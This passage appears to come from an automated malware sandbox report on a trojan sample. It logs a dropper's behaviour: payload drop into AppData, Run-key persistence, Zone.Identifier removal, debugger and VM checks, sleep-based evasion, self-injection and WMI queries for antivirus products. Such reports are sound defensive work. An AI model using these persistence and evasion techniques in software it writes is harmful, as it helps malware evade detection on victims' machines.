        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe "C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe"
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6696 -s 628
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe "C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe"
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 608
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeProcess created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxkJump to behavior
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeFile created: C:\Users\user\AppData\Roaming\mtmgxghqoJump to behavior
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeFile created: C:\Users\user\AppData\Local\Temp\nsg494E.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winEXE@12/18@16/2
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5420:120:WilError_01
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5948
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_01
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6696
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{b07368c6-c9e6-43bc-939d-00b8dbf662e7}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_01
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
        Source: xeWd55M5Lb.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: wntdll.pdbUGP source: jqenyeo.exe, 00000001.00000003.285113865.00000000025B0000.00000004.00001000.00020000.00000000.sdmp, jqenyeo.exe, 00000001.00000003.281647167.0000000002740000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: jqenyeo.exe, 00000001.00000003.285113865.00000000025B0000.00000004.00001000.00020000.00000000.sdmp, jqenyeo.exe, 00000001.00000003.281647167.0000000002740000.00000004.00001000.00020000.00000000.sdmp
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_00402565 push ecx; ret 1_2_00402578
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 6_2_00402565 push ecx; ret 6_2_00402578
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 17_2_00402565 push ecx; ret 17_2_00402578
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeFile created: C:\Users\user\AppData\Local\Temp\jqenyeo.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeFile created: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run wboyuqknqhxiarJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run wboyuqknqhxiarJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeFile opened: C:\Users\user\AppData\Local\Temp\jqenyeo.exe:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_004031FA RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004031FA
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-6642
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe TID: 6616Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe TID: 6608Thread sleep time: -800000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_6-6439
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-7082
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWindow / User API: foregroundWindowGot 819Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWindow / User API: foregroundWindowGot 723Jump to behavior
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeAPI coverage: 6.8 %
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeAPI coverage: 7.3 %
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeAPI call chain: ExitProcess graph end nodegraph_0-3479
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeAPI call chain: ExitProcess graph end nodegraph_1-7084
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeAPI call chain: ExitProcess graph end nodegraph_6-6441
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeAPI call chain: ExitProcess graph end node
        Source: xeWd55M5Lb.exe, 00000000.00000002.293043003.00000000007A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
        Source: jqenyeo.exe, 00000003.00000003.480383751.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.488734176.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.517122549.00000000006D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_004071A5 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_004071A5
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_004071A5 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_004071A5
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_0040819A __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_0040819A
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_009F03F8 mov eax, dword ptr fs:[00000030h]1_2_009F03F8
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_009F06F7 mov eax, dword ptr fs:[00000030h]1_2_009F06F7
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_009F061D mov eax, dword ptr fs:[00000030h]1_2_009F061D
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_009F0736 mov eax, dword ptr fs:[00000030h]1_2_009F0736
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_009F0772 mov eax, dword ptr fs:[00000030h]1_2_009F0772
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_004040DE SetUnhandledExceptionFilter,1_2_004040DE
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_0040410F SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0040410F
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 6_2_004040DE SetUnhandledExceptionFilter,6_2_004040DE
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 6_2_0040410F SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0040410F
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 17_2_004040DE SetUnhandledExceptionFilter,17_2_004040DE
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 17_2_0040410F SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0040410F

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeMemory written: C:\Users\user\AppData\Local\Temp\jqenyeo.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxkJump to behavior
        Source: jqenyeo.exe, 00000003.00000003.480383751.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.488734176.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.517122549.00000000006D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: jqenyeo.exe, 00000003.00000003.480383751.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.488734176.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.517122549.00000000006D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mProgram Manager
        Source: jqenyeo.exe, 00000003.00000003.517122549.00000000006D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mProgram ManagerrogramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=DESKTOP-716T77
        Source: jqenyeo.exe, 00000003.00000003.517122549.00000000006D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oProgram Manager
        Source: jqenyeo.exe, 00000003.00000003.517122549.00000000006D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager`O
        Source: jqenyeo.exe, 00000003.00000003.488734176.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.517122549.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.484552828.0000000000701000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerProgram Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPD
        Source: jqenyeo.exe, 00000003.00000003.445008058.0000000000700000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.451453735.0000000000700000.00000004.00000020.00020000.00000000.sdmp, jqenyeo.exe, 00000003.00000003.488734176.00000000006D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerrogramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=DESKTOP-716T77
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_00404D5C cpuid 1_2_00404D5C
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 1_2_00403C2E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00403C2E
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
